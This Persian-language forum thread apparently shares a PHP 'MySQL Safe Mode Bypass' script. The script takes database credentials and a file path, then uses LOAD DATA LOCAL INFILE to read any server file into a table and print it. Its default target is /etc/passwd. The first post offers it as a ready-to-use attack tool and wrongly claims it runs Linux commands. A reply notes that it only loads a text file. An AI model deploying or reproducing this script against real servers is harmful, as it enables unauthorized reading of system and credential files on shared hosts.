SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

Mysql Server Bypasser

بستن
X
بستن
 
  • صفحه از 1
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید
قبلی template بعدی
  • #1

    Mysql Server Bypasser

    با استفاده از این اسکریپت میتونید کامند های لینوکس خودتونو از طریق mysql سرور لینوکس اجرا و نتیجه بگیرید :

    [align=left]
    کد:
    <head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>

<body text="#FFFFFF" bgcolor="#000000">


<p align="center">
<br>
<font face="Tahoma" style="font-size: 15pt; font-weight: 700">XXXXXXXX Security Team<br>
Mysql Bypass <br>
</font><font face="Tahoma" size="2">4.4.7 / 5.2.3 PHP ver -&nbsp; MySQL Safe 
Mode Bypass Vulnerability<br>
Create mysql database and add user for mysql database</font><font face="Tahoma" style="font-size: 10pt; font-weight: 700"><br>
&nbsp;</font></p>
<div align="center">

<form method="post">

	<table border="0" cellspacing="1" width="859" height="6%">
		<tr>
			<td width="311"><font face="Tahoma"><span style="font-size: 9pt">&nbsp;DataBase 
			Name : <input type="text" name="dbname" size="20">&nbsp;&nbsp;&nbsp; 
			</span></font></td>
			<td width="240"><font face="Tahoma"><span style="font-size: 9pt">
			Username :&nbsp; <input type="text" name="dbuser" size="20">&nbsp;&nbsp;</span></font></td>
			<td width="298"><font face="Tahoma"><span style="font-size: 9pt">&nbsp;Password 
			:&nbsp; <input type="text" name="dbpass" size="20"></span></font></td>
		</tr>
		<tr>
			<td width="311" valign="middle">
			&nbsp;</td>
			<td width="240" valign="middle">
			&nbsp;</td>
			<td width="298" valign="middle">
			&nbsp;</td>
		</tr>
		<tr>
			<td width="554" valign="middle" colspan="2">
			<p align="left"><font face="Tahoma"><span style="font-size: 9pt">
			File Path :&nbsp;&nbsp;
			<input type="text" name="path1" size="45" style=" weight:200; height:21; width:229" dir="ltr" value="/etc/passwd">&nbsp;<input type="submit" value="Bypass" name="exec"></span></font></td>
			<td width="298" valign="middle">
			&nbsp;</td>
		</tr>
		<tr>
			<td width="855" valign="middle" colspan="3">
			<br>
			<?
if(!empty($_POST['dbname']) && !empty($_POST['dbuser']) && !empty($_POST['dbpass']) && !empty($_POST['path1'])) 
{
$dbname = $_POST['dbname'];
$dbuser = $_POST['dbuser'];
$dbpass = $_POST['dbpass'];
$path1 = $_POST['path1'];
if(mysql_connect( "localhost", $dbuser, $dbpass ))
{
$drop= "DROP TABLE $dbname.`bypass`" ;
$query = "CREATE TABLE $dbname.`bypass` (`fileview` VARCHAR( 2048 ) NOT NULL);";
mysql_query($drop);
mysql_query($query);
mysql_query("LOAD DATA LOCAL INFILE " . "'$path1'"  . " INTO TABLE " . $dbname . ".bypass");
$result =mysql_db_query($dbname,"SELECT * FROM bypass ");
$numrows = mysql_num_rows($result); 
?>

<textarea rows="15" name="result" cols="103">
<?   
while($row = mysql_fetch_array($result))   { 
echo $row[fileview] ; 

    } 
}

}

?>
</textarea></td>  	

		</tr>
	</table>
	</form>
</div>
    [/align]
    [align=center][/align]
    برچسب ها: هیچ یک
  • #2
    RE: Mysql Server Bypasser

    سلام دادا
    با توجه به چیزی که title خود کد نوشته این فقط میاد یه فایل تکست رو در یک تیبیل در دیتابیس ذخیره میکنه!
    که خوب کاره جالبیه
    تنها چیزی اضافه و به خصوصی که داشت این خط کد بود که کاره اصلی برنامه یعنی قرار دادن فایل تکست در تیبل
    [php] mysql_query("LOAD DATA LOCAL INFILE " . "'$path1'" . " INTO TABLE " . $dbname . ".bypass");[/php]

    نظر

    قبلی template بعدی
    صبر کنید ..
    X